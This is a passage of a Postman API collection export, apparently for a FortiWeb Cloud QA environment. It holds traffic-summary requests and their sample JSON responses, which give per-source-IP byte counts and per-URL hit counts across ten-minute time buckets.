          \"time\": 1660275000000,\n                \"data\": []\n            },\n            {\n                \"id\": 37,\n                \"time\": 1660275600000,\n                \"data\": []\n            },\n            {\n                \"id\": 38,\n                \"time\": 1660276200000,\n                \"data\": []\n            },\n            {\n                \"id\": 39,\n                \"time\": 1660276800000,\n                \"data\": []\n            },\n            {\n                \"id\": 40,\n                \"time\": 1660277400000,\n                \"data\": []\n            },\n            {\n                \"id\": 41,\n                \"time\": 1660278000000,\n                \"data\": []\n            },\n            {\n                \"id\": 42,\n                \"time\": 1660278600000,\n                \"data\": []\n            },\n            {\n                \"id\": 43,\n                \"time\": 1660279200000,\n                \"data\": []\n            },\n            {\n                \"id\": 44,\n                \"time\": 1660279800000,\n                \"data\": []\n            },\n            {\n                \"id\": 45,\n                \"time\": 1660280400000,\n                \"data\": []\n            },\n            {\n                \"id\": 46,\n                \"time\": 1660281000000,\n                \"data\": []\n            },\n            {\n                \"id\": 47,\n                \"time\": 1660281600000,\n                \"data\": []\n            },\n            {\n                \"id\": 48,\n                \"time\": 1660282200000,\n                \"data\": []\n            },\n            {\n                \"id\": 49,\n                \"time\": 1660282800000,\n                \"data\": []\n            },\n            {\n                \"id\": 50,\n                \"time\": 1660283400000,\n                \"data\": []\n            },\n            {\n                \"id\": 51,\n                \"time\": 1660284000000,\n                \"data\": []\n            },\n            {\n                \"id\": 52,\n                \"time\": 1660284600000,\n                \"data\": []\n            },\n            {\n                \"id\": 53,\n                \"time\": 1660285200000,\n                \"data\": []\n            },\n            {\n                \"id\": 54,\n                \"time\": 1660285800000,\n                \"data\": []\n            },\n            {\n                \"id\": 55,\n                \"time\": 1660286400000,\n                \"data\": []\n            },\n            {\n                \"id\": 56,\n                \"time\": 1660287000000,\n                \"data\": []\n            },\n            {\n                \"id\": 57,\n                \"time\": 1660287600000,\n                \"data\": []\n            },\n            {\n                \"id\": 58,\n                \"time\": 1660288200000,\n                \"data\": []\n            },\n            {\n                \"id\": 59,\n                \"time\": 1660288800000,\n                \"data\": []\n            },\n            {\n                \"id\": 60,\n                \"time\": 1660289400000,\n                \"data\": []\n            },\n            {\n                \"id\": 61,\n                \"time\": 1660290000000,\n                \"data\": []\n            },\n            {\n                \"id\": 62,\n                \"time\": 1660290600000,\n                \"data\": []\n            },\n            {\n                \"id\": 63,\n                \"time\": 1660291200000,\n                \"data\": []\n            },\n            {\n                \"id\": 64,\n                \"time\": 1660291800000,\n                \"data\": []\n            },\n            {\n                \"id\": 65,\n                \"time\": 1660292400000,\n                \"data\": []\n            },\n            {\n                \"id\": 66,\n                \"time\": 1660293000000,\n                \"data\": []\n            },\n            {\n                \"id\": 67,\n                \"time\": 1660293600000,\n                \"data\": []\n            },\n            {\n                \"id\": 68,\n                \"time\": 1660294200000,\n                \"data\": []\n            },\n            {\n                \"id\": 69,\n                \"time\": 1660294800000,\n                \"data\": []\n            },\n            {\n                \"id\": 70,\n                \"time\": 1660295400000,\n                \"data\": []\n            },\n            {\n                \"id\": 71,\n                \"time\": 1660296000000,\n                \"data\": []\n            },\n            {\n                \"id\": 72,\n                \"time\": 1660296600000,\n                \"data\": []\n            },\n            {\n                \"id\": 73,\n                \"time\": 1660297200000,\n                \"data\": []\n            },\n            {\n                \"id\": 74,\n                \"time\": 1660297800000,\n                \"data\": []\n            },\n            {\n                \"id\": 75,\n                \"time\": 1660298400000,\n                \"data\": []\n            },\n            {\n                \"id\": 76,\n                \"time\": 1660299000000,\n                \"data\": []\n            },\n            {\n                \"id\": 77,\n                \"time\": 1660299600000,\n                \"data\": []\n            },\n            {\n                \"id\": 78,\n                \"time\": 1660300200000,\n                \"data\": []\n            },\n            {\n                \"id\": 79,\n                \"time\": 1660300800000,\n                \"data\": []\n            },\n            {\n                \"id\": 80,\n                \"time\": 1660301400000,\n                \"data\": []\n            },\n            {\n                \"id\": 81,\n                \"time\": 1660302000000,\n                \"data\": []\n            },\n            {\n                \"id\": 82,\n                \"time\": 1660302600000,\n                \"data\": []\n            },\n            {\n                \"id\": 83,\n                \"time\": 1660303200000,\n                \"data\": []\n            },\n            {\n                \"id\": 84,\n                \"time\": 1660303800000,\n                \"data\": []\n            },\n            {\n                \"id\": 85,\n                \"time\": 1660304400000,\n                \"data\": []\n            },\n            {\n                \"id\": 86,\n                \"time\": 1660305000000,\n                \"data\": []\n            },\n            {\n                \"id\": 87,\n                \"time\": 1660305600000,\n                \"data\": []\n            },\n            {\n                \"id\": 88,\n                \"time\": 1660306200000,\n                \"data\": []\n            },\n            {\n                \"id\": 89,\n                \"time\": 1660306800000,\n                \"data\": []\n            },\n            {\n                \"id\": 90,\n                \"time\": 1660307400000,\n                \"data\": []\n            },\n            {\n                \"id\": 91,\n                \"time\": 1660308000000,\n                \"data\": []\n            },\n            {\n                \"id\": 92,\n                \"time\": 1660308600000,\n                \"data\": []\n            },\n            {\n                \"id\": 93,\n                \"time\": 1660309200000,\n                \"data\": []\n            },\n            {\n                \"id\": 94,\n                \"time\": 1660309800000,\n                \"data\": []\n            },\n            {\n                \"id\": 95,\n                \"time\": 1660310400000,\n                \"data\": []\n            },\n            {\n                \"id\": 96,\n                \"time\": 1660311000000,\n                \"data\": []\n            },\n            {\n                \"id\": 97,\n                \"time\": 1660311600000,\n                \"data\": []\n            },\n            {\n                \"id\": 98,\n                \"time\": 1660312200000,\n                \"data\": []\n            },\n            {\n                \"id\": 99,\n                \"time\": 1660312800000,\n                \"data\": []\n            },\n            {\n                \"id\": 100,\n                \"time\": 1660313400000,\n                \"data\": []\n            },\n            {\n                \"id\": 101,\n                \"time\": 1660314000000,\n                \"data\": []\n            },\n            {\n                \"id\": 102,\n                \"time\": 1660314600000,\n                \"data\": []\n            },\n            {\n                \"id\": 103,\n                \"time\": 1660315200000,\n                \"data\": []\n            },\n            {\n                \"id\": 104,\n                \"time\": 1660315800000,\n                \"data\": []\n            },\n            {\n                \"id\": 105,\n                \"time\": 1660316400000,\n                \"data\": []\n            },\n            {\n                \"id\": 106,\n                \"time\": 1660317000000,\n                \"data\": []\n            },\n            {\n                \"id\": 107,\n                \"time\": 1660317600000,\n                \"data\": []\n            },\n            {\n                \"id\": 108,\n                \"time\": 1660318200000,\n                \"data\": []\n            },\n            {\n                \"id\": 109,\n                \"time\": 1660318800000,\n                \"data\": []\n            },\n            {\n                \"id\": 110,\n                \"time\": 1660319400000,\n                \"data\": []\n            },\n            {\n                \"id\": 111,\n                \"time\": 1660320000000,\n                \"data\": []\n            },\n            {\n                \"id\": 112,\n                \"time\": 1660320600000,\n                \"data\": []\n            },\n            {\n                \"id\": 113,\n                \"time\": 1660321200000,\n                \"data\": []\n            },\n            {\n                \"id\": 114,\n                \"time\": 1660321800000,\n                \"data\": []\n            },\n            {\n                \"id\": 115,\n                \"time\": 1660322400000,\n                \"data\": []\n            },\n            {\n                \"id\": 116,\n                \"time\": 1660323000000,\n                \"data\": []\n            },\n            {\n                \"id\": 117,\n                \"time\": 1660323600000,\n                \"data\": []\n            },\n            {\n                \"id\": 118,\n                \"time\": 1660324200000,\n                \"data\": []\n            },\n            {\n                \"id\": 119,\n                \"time\": 1660324800000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 458,\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 120,\n                \"time\": 1660325400000,\n                \"data\": []\n            },\n            {\n                \"id\": 121,\n                \"time\": 1660326000000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 14949,\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 122,\n                \"time\": 1660326600000,\n                \"data\": []\n            },\n            {\n                \"id\": 123,\n                \"time\": 1660327200000,\n                \"data\": []\n            },\n            {\n                \"id\": 124,\n                \"time\": 1660327800000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 14949,\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 125,\n                \"time\": 1660328400000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 59796,\n                            \"count_sum\": 12\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 126,\n                \"time\": 1660329000000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 60169,\n                            \"count_sum\": 13\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 127,\n                \"time\": 1660329600000,\n                \"data\": []\n            },\n            {\n                \"id\": 128,\n                \"time\": 1660330200000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 458,\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 129,\n                \"time\": 1660330800000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 25830,\n                            \"count_sum\": 7\n                        }\n                    },\n                    {\n                        \"source\": \"52.112.95.38\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 1221,\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 130,\n                \"time\": 1660331400000,\n                \"data\": []\n            },\n            {\n                \"id\": 131,\n                \"time\": 1660332000000,\n                \"data\": [\n                    {\n                        \"source\": \"96.45.34.121\",\n                        \"value\": {\n                            \"average_http_response_bytes_sum\": 4983,\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 132,\n                \"time\": 1660332600000,\n                \"data\": []\n            },\n            {\n                \"id\": 133,\n                \"time\": 1660333200000,\n                \"data\": []\n            },\n            {\n                \"id\": 134,\n                \"time\": 1660333800000,\n                \"data\": []\n            },\n            {\n                \"id\": 135,\n                \"time\": 1660334400000,\n                \"data\": []\n            },\n            {\n                \"id\": 136,\n                \"time\": 1660335000000,\n                \"data\": []\n            },\n            {\n                \"id\": 137,\n                \"time\": 1660335600000,\n                \"data\": []\n            },\n            {\n                \"id\": 138,\n                \"time\": 1660336200000,\n                \"data\": []\n            },\n            {\n                \"id\": 139,\n                \"time\": 1660336800000,\n                \"data\": []\n            },\n            {\n                \"id\": 140,\n                \"time\": 1660337400000,\n                \"data\": []\n            },\n            {\n                \"id\": 141,\n                \"time\": 1660338000000,\n                \"data\": []\n            },\n            {\n                \"id\": 142,\n                \"time\": 1660338600000,\n                \"data\": []\n            },\n            {\n                \"id\": 143,\n                \"time\": 1660339200000,\n                \"data\": []\n            },\n            {\n                \"id\": 144,\n                \"time\": 1660339800000,\n                \"data\": []\n            },\n            {\n                \"id\": 145,\n                \"time\": 1660340400000,\n                \"data\": []\n            }\n        ]\n    }\n}"}],"_postman_id":"8e7421d8-e460-4b09-9a78-6fcf528cbbbb"},{"name":"Get Traffic Log URL Statics Copy","id":"6170a87c-b772-4369-8580-d9daf5790303","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/url_statistics?type={{type}}&start_time={{start_time}}&end_time={{end_time}}&page={{page}}&size={{size}}&sort_by={{sort_by}}&filter={{filter}}","urlObject":{"protocol":"https","path":["v1","application",":ep_id","traffic_summary","url_statistics"],"host":["api","fortiweb-cloud-qa","com"],"query":[{"description":{"content":"<p>the type of query result only support \"summary\" and \"detail\"</p>\n","type":"text/plain"},"key":"type","value":"{{type}}"},{"description":{"content":"<p>the start time of timespan</p>\n","type":"text/plain"},"key":"start_time","value":"{{start_time}}"},{"description":{"content":"<p>the end time of timespan</p>\n","type":"text/plain"},"key":"end_time","value":"{{end_time}}"},{"description":{"content":"<p>the page number of requested information</p>\n","type":"text/plain"},"key":"page","value":"{{page}}"},{"description":{"content":"<p>the result table size</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>The field will be sorted</p>\n","type":"text/plain"},"key":"sort_by","value":"{{sort_by}}"},{"description":{"content":"<p>For example, for the URL details table, the filter is \"{“srccountry\": “canada, united state”, \"http_url\": “/ip/*”}\"</p>\n","type":"text/plain"},"key":"filter","value":"{{filter}}"}],"variable":[{"id":"7a793464-c6a6-48af-aed0-062d8c17f391","type":"any","value":null,"key":"ep_id"}]}},"response":[{"id":"ca1d1ac9-1354-480f-a74e-c9ead4623be0","name":"Get Traffic Log URL Statics","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/url_statistics?type=summary&start_time=1660254330143&end_time=1660340730143\n","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summary","url_statistics"],"query":[{"key":"type","value":"summary","description":"the type of query result only support \"summary\" and \"detail\""},{"key":"start_time","value":"1660254330143","description":"the start time of timespan"},{"key":"end_time","value":"1660340730143\n","description":"the end time of timespan"},{"key":"page","value":"{{page}}","description":"the page number of requested information","disabled":true},{"key":"size","value":"{{size}}","description":"the result table size","disabled":true},{"key":"sort_by","value":"{{sort_by}}","description":"The field will be sorted","disabled":true},{"key":"filter","value":"{{filter}}","description":"For example, for the URL details table, the filter is \"{“srccountry\": “canada, united state”, \"http_url\": “/ip/*”}\"","disabled":true}],"variable":[{"key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"details\": {\n        \"/image\": {\n            \"count\": 41\n        },\n        \"/\": {\n            \"count\": 7\n        },\n        \"/favicon.ico\": {\n            \"count\": 3\n        },\n        \"/contact\": {\n            \"count\": 1\n        }\n    },\n    \"summary\": {\n        \"start\": \"1660254330143\",\n        \"end\": \"1660340730143\",\n        \"count\": 145,\n        \"graph\": [\n            {\n                \"id\": 1,\n                \"time\": 1660254000000,\n                \"data\": []\n            },\n            {\n                \"id\": 2,\n                \"time\": 1660254600000,\n                \"data\": []\n            },\n            {\n                \"id\": 3,\n                \"time\": 1660255200000,\n                \"data\": []\n            },\n            {\n                \"id\": 4,\n                \"time\": 1660255800000,\n                \"data\": []\n            },\n            {\n                \"id\": 5,\n                \"time\": 1660256400000,\n                \"data\": []\n            },\n            {\n                \"id\": 6,\n                \"time\": 1660257000000,\n                \"data\": []\n            },\n            {\n                \"id\": 7,\n                \"time\": 1660257600000,\n                \"data\": []\n            },\n            {\n                \"id\": 8,\n                \"time\": 1660258200000,\n                \"data\": []\n            },\n            {\n                \"id\": 9,\n                \"time\": 1660258800000,\n                \"data\": [\n                    {\n                        \"source\": \"/\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    },\n                    {\n                        \"source\": \"/image\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 10,\n                \"time\": 1660259400000,\n                \"data\": [\n                    {\n                        \"source\": \"/favicon.ico\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    },\n                    {\n                        \"source\": \"/image\",\n                        \"value\": {\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 11,\n                \"time\": 1660260000000,\n                \"data\": []\n            },\n            {\n                \"id\": 12,\n                \"time\": 1660260600000,\n                \"data\": []\n            },\n            {\n                \"id\": 13,\n                \"time\": 1660261200000,\n                \"data\": []\n            },\n            {\n                \"id\": 14,\n                \"time\": 1660261800000,\n                \"data\": []\n            },\n            {\n                \"id\": 15,\n                \"time\": 1660262400000,\n                \"data\": []\n            },\n            {\n                \"id\": 16,\n                \"time\": 1660263000000,\n                \"data\": []\n            },\n            {\n                \"id\": 17,\n                \"time\": 1660263600000,\n                \"data\": []\n            },\n            {\n                \"id\": 18,\n                \"time\": 1660264200000,\n                \"data\": []\n            },\n            {\n                \"id\": 19,\n                \"time\": 1660264800000,\n                \"data\": []\n            },\n            {\n                \"id\": 20,\n                \"time\": 1660265400000,\n                \"data\": []\n            },\n            {\n                \"id\": 21,\n                \"time\": 1660266000000,\n                \"data\": []\n            },\n            {\n                \"id\": 22,\n                \"time\": 1660266600000,\n                \"data\": []\n            },\n            {\n                \"id\": 23,\n                \"time\": 1660267200000,\n                \"data\": []\n            },\n            {\n                \"id\": 24,\n                \"time\": 1660267800000,\n                \"data\": []\n            },\n            {\n                \"id\": 25,\n                \"time\": 1660268400000,\n                \"data\": []\n            },\n            {\n                \"id\": 26,\n                \"time\": 1660269000000,\n                \"data\": []\n            },\n            {\n                \"id\": 27,\n                \"time\": 1660269600000,\n                \"data\": []\n            },\n            {\n                \"id\": 28,\n                \"time\": 1660270200000,\n                \"data\": []\n            },\n            {\n                \"id\": 29,\n                \"time\": 1660270800000,\n                \"data\": []\n            },\n            {\n                \"id\": 30,\n                \"time\": 1660271400000,\n                \"data\": []\n            },\n            {\n                \"id\": 31,\n                \"time\": 1660272000000,\n                \"data\": []\n            },\n            {\n                \"id\": 32,\n                \"time\": 1660272600000,\n                \"data\": []\n            },\n            {\n                \"id\": 33,\n                \"time\": 1660273200000,\n                \"data\": []\n            },\n            {\n                \"id\": 34,\n                \"time\": 1660273800000,\n                \"data\": []\n            },\n            {\n                \"id\": 35,\n                \"time\": 1660274400000,\n                \"data\": []\n            },\n            {\n                \"id\": 36,\n                \"time\": 1660275000000,\n                \"data\": []\n            },\n            {\n                \"id\": 37,\n                \"time\": 1660275600000,\n                \"data\": []\n            },\n            {\n                \"id\": 38,\n                \"time\": 1660276200000,\n                \"data\": []\n            },\n            {\n                \"id\": 39,\n                \"time\": 1660276800000,\n                \"data\": []\n            },\n            {\n                \"id\": 40,\n                \"time\": 1660277400000,\n                \"data\": []\n            },\n            {\n                \"id\": 41,\n                \"time\": 1660278000000,\n                \"data\": []\n            },\n            {\n                \"id\": 42,\n                \"time\": 1660278600000,\n                \"data\": []\n            },\n            {\n                \"id\": 43,\n                \"time\": 1660279200000,\n                \"data\": []\n            },\n            {\n                \"id\": 44,\n                \"time\": 1660279800000,\n                \"data\": []\n            },\n            {\n                \"id\": 45,\n                \"time\": 1660280400000,\n                \"data\": []\n            },\n            {\n                \"id\": 46,\n                \"time\": 1660281000000,\n                \"data\": []\n            },\n            {\n                \"id\": 47,\n                \"time\": 1660281600000,\n                \"data\": []\n            },\n            {\n                \"id\": 48,\n                \"time\": 1660282200000,\n                \"data\": []\n            },\n            {\n                \"id\": 49,\n                \"time\": 1660282800000,\n                \"data\": []\n            },\n            {\n                \"id\": 50,\n                \"time\": 1660283400000,\n                \"data\": []\n            },\n            {\n                \"id\": 51,\n                \"time\": 1660284000000,\n                \"data\": []\n            },\n            {\n                \"id\": 52,\n                \"time\": 1660284600000,\n                \"data\": []\n            },\n            {\n                \"id\": 53,\n                \"time\": 1660285200000,\n                \"data\": []\n            },\n            {\n                \"id\": 54,\n                \"time\": 1660285800000,\n                \"data\": []\n            },\n            {\n                \"id\": 55,\n                \"time\": 1660286400000,\n                \"data\": []\n            },\n            {\n                \"id\": 56,\n                \"time\": 1660287000000,\n                \"data\": []\n            },\n            {\n                \"id\": 57,\n                \"time\": 1660287600000,\n                \"data\": []\n            },\n            {\n                \"id\": 58,\n                \"time\": 1660288200000,\n                \"data\": []\n            },\n            {\n                \"id\": 59,\n                \"time\": 1660288800000,\n                \"data\": []\n            },\n            {\n                \"id\": 60,\n                \"time\": 1660289400000,\n                \"data\": []\n            },\n            {\n                \"id\": 61,\n                \"time\": 1660290000000,\n                \"data\": []\n            },\n            {\n                \"id\": 62,\n                \"time\": 1660290600000,\n                \"data\": []\n            },\n            {\n                \"id\": 63,\n                \"time\": 1660291200000,\n                \"data\": []\n            },\n            {\n                \"id\": 64,\n                \"time\": 1660291800000,\n                \"data\": []\n            },\n            {\n                \"id\": 65,\n                \"time\": 1660292400000,\n                \"data\": []\n            },\n            {\n                \"id\": 66,\n                \"time\": 1660293000000,\n                \"data\": []\n            },\n            {\n                \"id\": 67,\n                \"time\": 1660293600000,\n                \"data\": []\n            },\n            {\n                \"id\": 68,\n                \"time\": 1660294200000,\n                \"data\": []\n            },\n            {\n                \"id\": 69,\n                \"time\": 1660294800000,\n                \"data\": []\n            },\n            {\n                \"id\": 70,\n                \"time\": 1660295400000,\n                \"data\": []\n            },\n            {\n                \"id\": 71,\n                \"time\": 1660296000000,\n                \"data\": []\n            },\n            {\n                \"id\": 72,\n                \"time\": 1660296600000,\n                \"data\": []\n            },\n            {\n                \"id\": 73,\n                \"time\": 1660297200000,\n                \"data\": []\n            },\n            {\n                \"id\": 74,\n                \"time\": 1660297800000,\n                \"data\": []\n            },\n            {\n                \"id\": 75,\n                \"time\": 1660298400000,\n                \"data\": []\n            },\n            {\n                \"id\": 76,\n                \"time\": 1660299000000,\n                \"data\": []\n            },\n            {\n                \"id\": 77,\n                \"time\": 1660299600000,\n                \"data\": []\n            },\n            {\n                \"id\": 78,\n                \"time\": 1660300200000,\n                \"data\": []\n            },\n            {\n                \"id\": 79,\n                \"time\": 1660300800000,\n                \"data\": []\n            },\n            {\n                \"id\": 80,\n                \"time\": 1660301400000,\n                \"data\": []\n            },\n            {\n                \"id\": 81,\n                \"time\": 1660302000000,\n                \"data\": []\n            },\n            {\n                \"id\": 82,\n                \"time\": 1660302600000,\n                \"data\": []\n            },\n            {\n                \"id\": 83,\n                \"time\": 1660303200000,\n                \"data\": []\n            },\n            {\n                \"id\": 84,\n                \"time\": 1660303800000,\n                \"data\": []\n            },\n            {\n                \"id\": 85,\n                \"time\": 1660304400000,\n                \"data\": []\n            },\n            {\n                \"id\": 86,\n                \"time\": 1660305000000,\n                \"data\": []\n            },\n            {\n                \"id\": 87,\n                \"time\": 1660305600000,\n                \"data\": []\n            },\n            {\n                \"id\": 88,\n                \"time\": 1660306200000,\n                \"data\": []\n            },\n            {\n                \"id\": 89,\n                \"time\": 1660306800000,\n                \"data\": []\n            },\n            {\n                \"id\": 90,\n                \"time\": 1660307400000,\n                \"data\": []\n            },\n            {\n                \"id\": 91,\n                \"time\": 1660308000000,\n                \"data\": []\n            },\n            {\n                \"id\": 92,\n                \"time\": 1660308600000,\n                \"data\": []\n            },\n            {\n                \"id\": 93,\n                \"time\": 1660309200000,\n                \"data\": []\n            },\n            {\n                \"id\": 94,\n                \"time\": 1660309800000,\n                \"data\": []\n            },\n            {\n                \"id\": 95,\n                \"time\": 1660310400000,\n                \"data\": []\n            },\n            {\n                \"id\": 96,\n                \"time\": 1660311000000,\n                \"data\": []\n            },\n            {\n                \"id\": 97,\n                \"time\": 1660311600000,\n                \"data\": []\n            },\n            {\n                \"id\": 98,\n                \"time\": 1660312200000,\n                \"data\": []\n            },\n            {\n                \"id\": 99,\n                \"time\": 1660312800000,\n                \"data\": []\n            },\n            {\n                \"id\": 100,\n                \"time\": 1660313400000,\n                \"data\": []\n            },\n            {\n                \"id\": 101,\n                \"time\": 1660314000000,\n                \"data\": []\n            },\n            {\n                \"id\": 102,\n                \"time\": 1660314600000,\n                \"data\": []\n            },\n            {\n                \"id\": 103,\n                \"time\": 1660315200000,\n                \"data\": []\n            },\n            {\n                \"id\": 104,\n                \"time\": 1660315800000,\n                \"data\": []\n            },\n            {\n                \"id\": 105,\n                \"time\": 1660316400000,\n                \"data\": []\n            },\n            {\n                \"id\": 106,\n                \"time\": 1660317000000,\n                \"data\": []\n            },\n            {\n                \"id\": 107,\n                \"time\": 1660317600000,\n                \"data\": []\n            },\n            {\n                \"id\": 108,\n                \"time\": 1660318200000,\n                \"data\": []\n            },\n            {\n                \"id\": 109,\n                \"time\": 1660318800000,\n                \"data\": []\n            },\n            {\n                \"id\": 110,\n                \"time\": 1660319400000,\n                \"data\": []\n            },\n            {\n                \"id\": 111,\n                \"time\": 1660320000000,\n                \"data\": []\n            },\n            {\n                \"id\": 112,\n                \"time\": 1660320600000,\n                \"data\": []\n            },\n            {\n                \"id\": 113,\n                \"time\": 1660321200000,\n                \"data\": []\n            },\n            {\n                \"id\": 114,\n                \"time\": 1660321800000,\n                \"data\": []\n            },\n            {\n                \"id\": 115,\n                \"time\": 1660322400000,\n                \"data\": []\n            },\n            {\n                \"id\": 116,\n                \"time\": 1660323000000,\n                \"data\": []\n            },\n            {\n                \"id\": 117,\n                \"time\": 1660323600000,\n                \"data\": []\n            },\n            {\n                \"id\": 118,\n                \"time\": 1660324200000,\n                \"data\": []\n            },\n            {\n                \"id\": 119,\n                \"time\": 1660324800000,\n                \"data\": [\n                    {\n                        \"source\": \"/\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 120,\n                \"time\": 1660325400000,\n                \"data\": []\n            },\n            {\n                \"id\": 121,\n                \"time\": 1660326000000,\n                \"data\": [\n                    {\n                        \"source\": \"/image\",\n                        \"value\": {\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 122,\n                \"time\": 1660326600000,\n                \"data\": []\n            },\n            {\n                \"id\": 123,\n                \"time\": 1660327200000,\n                \"data\": []\n            },\n            {\n                \"id\": 124,\n                \"time\": 1660327800000,\n                \"data\": [\n                    {\n                        \"source\": \"/image\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 125,\n                \"time\": 1660328400000,\n                \"data\": [\n                    {\n                        \"source\": \"/image\",\n                        \"value\": {\n                            \"count_sum\": 12\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 126,\n                \"time\": 1660329000000,\n                \"data\": [\n                    {\n                        \"source\": \"/image\",\n                        \"value\": {\n                            \"count_sum\": 12\n                        }\n                    },\n                    {\n                        \"source\": \"/favicon.ico\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 127,\n                \"time\": 1660329600000,\n                \"data\": []\n            },\n            {\n                \"id\": 128,\n                \"time\": 1660330200000,\n                \"data\": [\n                    {\n                        \"source\": \"/\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 129,\n                \"time\": 1660330800000,\n                \"data\": [\n                    {\n                        \"source\": \"/\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    },\n                    {\n                        \"source\": \"/image\",\n                        \"value\": {\n                            \"count_sum\": 5\n                        }\n                    },\n                    {\n                        \"source\": \"/contact\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    },\n                    {\n                        \"source\": \"/favicon.ico\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 130,\n                \"time\": 1660331400000,\n                \"data\": []\n            },\n            {\n                \"id\": 131,\n                \"time\": 1660332000000,\n                \"data\": [\n                    {\n                        \"source\": \"/image\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 132,\n                \"time\": 1660332600000,\n                \"data\": []\n            },\n            {\n                \"id\": 133,\n                \"time\": 1660333200000,\n                \"data\": []\n            },\n            {\n                \"id\": 134,\n                \"time\": 1660333800000,\n                \"data\": []\n            },\n            {\n                \"id\": 135,\n                \"time\": 1660334400000,\n                \"data\": []\n            },\n            {\n                \"id\": 136,\n                \"time\": 1660335000000,\n                \"data\": []\n            },\n            {\n                \"id\": 137,\n                \"time\": 1660335600000,\n                \"data\": []\n            },\n            {\n                \"id\": 138,\n                \"time\": 1660336200000,\n                \"data\": []\n            },\n            {\n                \"id\": 139,\n                \"time\": 1660336800000,\n                \"data\": []\n            },\n            {\n                \"id\": 140,\n                \"time\": 1660337400000,\n                \"data\": []\n            },\n            {\n                \"id\": 141,\n                \"time\": 1660338000000,\n                \"data\": []\n            },\n            {\n                \"id\": 142,\n                \"time\": 1660338600000,\n                \"data\": []\n            },\n            {\n                \"id\": 143,\n                \"time\": 1660339200000,\n                \"data\": []\n            },\n            {\n                \"id\": 144,\n                \"time\": 1660339800000,\n                \"data\": []\n            },\n            {\n                \"id\": 145,\n                \"time\": 1660340400000,\n                \"data\": []\n            }\n        ]\n    }\n}"},{"id":"b34c0483-4739-4844-a9e5-d97c1c948833","name":"Get Traffic Log URL Statics Detail 24 Hours","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/traffic_summary/url_statistics?type=details&start_time=1660254450854&end_time=1660340850854&page=1&size=5&sort_by=total_number&filter=%7B%22http_url%22%3A%22%2F%22%7D","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summary","traffic_summary","url_statistics"],"query":[{"key":"type","value":"details"},{"key":"start_time","value":"1660254450854"},{"key":"end_time","value":"1660340850854"},{"key":"page","value":"1"},{"key":"size","value":"5"},{"key":"sort_by","value":"total_number"},{"key":"filter","value":"%7B%22http_url%22%3A%22%2F%22%7D"}],"variable":[{"key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"details\": {\n        \"/\": {\n            \"count\": 7\n        }\n    },\n    \"summary\": {\n        \"start\": \"1660254450854\",\n        \"end\": \"1660340850854\",\n        \"count\": 145,\n        \"graph\": [\n            {\n                \"id\": 1,\n                \"time\": 1660254000000,\n                \"data\": []\n            },\n            {\n                \"id\": 2,\n                \"time\": 1660254600000,\n                \"data\": []\n            },\n            {\n                \"id\": 3,\n                \"time\": 1660255200000,\n                \"data\": []\n            },\n            {\n                \"id\": 4,\n                \"time\": 1660255800000,\n                \"data\": []\n            },\n            {\n                \"id\": 5,\n                \"time\": 1660256400000,\n                \"data\": []\n            },\n            {\n                \"id\": 6,\n                